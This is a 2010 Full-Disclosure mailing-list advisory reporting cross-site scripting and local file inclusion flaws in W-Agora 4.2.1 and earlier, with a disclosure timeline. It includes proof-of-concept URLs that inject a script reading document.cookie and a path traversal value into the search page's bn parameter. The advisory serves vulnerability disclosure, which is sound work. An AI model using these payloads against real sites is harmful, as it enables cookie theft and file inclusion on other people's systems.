Vulnerabilities in W-Agora

["MustLive" <mustlive () websecurity com ua>]

Hello Full-Disclosure!

I want to warn you about Cross-Site Scripting and Local File Inclusion 
vulnerabilities in W-Agora. In addition to vulnerabilities in this system 
which I found and disclosed in 2006 (SecurityVulns ID: 6960).

-------------------------
Affected products:
-------------------------

Vulnerable are W-Agora 4.2.1 and previous versions.

----------
Details:
----------

XSS (WASC-08):

http://site/news/search.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion (WASC-31):

It's possible to include php-files (with extension php3 in version W-Agora 
4.1.5 or with extension php in version 4.2.1).

In folder conf:

http://site/news/search.php3?bn=1

In any folder (only on Windows-servers):

http://site/news/search.php3?bn=..\1

In last versions of the system search.php3 has name search.php.

------------
Timeline:
------------

2010.08.27 - announced at my site.
2010.08.29 - informed developers. Developers of W-Agora didn't answer and 
didn't fix the holes (unlike in 2006).
2010.10.22 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4481/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/